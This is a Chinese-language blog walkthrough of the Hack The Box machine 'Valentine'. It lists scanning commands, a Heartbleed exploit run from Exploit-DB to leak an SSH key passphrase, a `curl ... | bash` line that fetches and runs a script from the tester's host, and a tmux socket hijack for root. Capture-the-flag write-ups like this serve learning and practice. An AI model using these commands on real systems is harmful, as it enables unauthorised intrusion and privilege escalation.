Valentine

Posted by admin on 2020年2月22日

Valentine

zenmap扫描端口

file

80和443全部都是静态图

file

dirbuster扫描443目录

file

dev目录

file

访问：https://10.10.10.79/dev/hype_key
使用：http://www.bejson.com/convert/ox2str/
十六进制解码

gedit sshkey

file

nmap扫描心脏出血漏洞

nmap --script ssl-heartbleed -p 443 10.10.10.79

file

查找利用脚本

searchsploit heartbleed
searchsploit -m exploits/multiple/remote/32764.py
cp /usr/share/exploitdb/exploits/multiple/remote/32764.py .

file

漏洞利用

python 32764.py 10.10.10.79

file

解密text：heartbleedbelievethehype

echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d

file

根据文件的名字猜测用户名：hype
密码：heartbleedbelievethehype

chmod 400 sshkey
ssh -i sshkey hype@10.10.10.79

file

get user.txt

file

创建python http sever

python -m SimpleHTTPServer 80

curl http://10.10.14.45/LinEnum.sh | bash

file

get root shell
tmux的使用可以看我的文章：
tmux

tmux -S /.devs/dev_sess

file

get root.txt

file

发表评论取消回复

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据。

Smi1e's Blog

Primary penetration testing engineer

Valentine

Valentine

发表评论取消回复

Smi1e's Blog

Primary penetration testing engineer

Valentine

Valentine

发表评论 取消回复

发表评论取消回复